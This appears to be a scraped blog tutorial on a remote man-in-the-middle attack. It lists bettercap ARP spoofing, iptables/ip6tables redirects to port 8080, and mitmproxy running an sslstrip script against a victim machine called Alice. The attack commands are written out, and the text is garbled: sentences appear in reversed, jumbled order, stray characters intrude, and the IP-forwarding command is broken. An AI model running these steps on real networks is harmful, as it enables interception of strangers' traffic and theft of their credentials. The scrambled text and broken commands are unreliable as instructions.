![]() ![]() If you wanna do any web page replacements, it’s best to be done as a python script and attached with -s parameter with mitmproxy. ![]() If you’re on a local environment (not with a remote Alice), we can run arp -a on Alice now to see that BlackArch’s MAC address has been duplicated to the gateway as well. > # I won't see any HTTP packets here since I didn't run http.proxy module > net.sniff on # Sniff the network, just to know if things are working. Since the redirection occurs to my machine, packets are local > net.recon off # Disable net.recon modules Let’s say we found out it’s 10.10.10.4Ĭonduct the ARP spoof: > $ sudo bettercap -iface enp0s3 To be frank, I would even use Burp as the proxy instead, but I prefer mitmproxy since its CLI-based and works in a pinch.Ĭonduct a small nmap scan to figure out what’s Alice’s IP. I love it and it works like magic, but I’d rather have one tool do one thing. NOTE: you can actually setup a proxy with Bettercap’s http.proxy and https.proxy modules. If you’re doing this locally (not to a remote target) for the purposes of dynamic analysis or whatever, don’t use sslstrip.py and navigate to AFTER the arp spoofing step to install mitmproxy’s SSL certificates ARP Spoofing with Bettercap It’s not ideal for navigating in-between the pages, but an unsuspecting target will be vulnerable. The sslstrip.py script is there to strip-out HTTPS headers during a redirection. And we have a proxy setup to intercept anything going there (HTTP and HTTPS). We’ve got redirection to port 8080 (mitmproxy port). Link: $ mitmproxy -mode transparent -showhost -s sslstrip.py # - showhost will show the host in the URL display Mitmproxy will take care of the rest Setup the Proxy: MitmProxy $ ip6tables -t nat -A PREROUTING -p tcp -dport 443 -j REDIRECT -to-port 8080 $ ip6tables -t nat -A PREROUTING -p tcp -dport 80 -j REDIRECT -to-port 8080 $ iptables -t nat -A PREROUTING -p tcp -dport 443 -j REDIRECT -to-port 8080 $ iptables -t nat -A PREROUTING -p tcp -dport 80 -j REDIRECT -to-port 8080 Setup IP Forwarding and Redirection $ sysctl -w _forward=1 We’ll need to setup some IP forwarding and redirection first. I did this in testing by having both of them in a Bridged network configuration under my phone’s hotspot. Hook the attack machine (which I’ll call BlackArch) and the victim machine (which I’ll call Alice) to the same network. Remote Man-in-the-Middle with Bettercap and Mitmproxy Remote MITM Setup Basic Environment Setup Remote Man-in-the-Middle with Bettercap and Mitmproxy ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |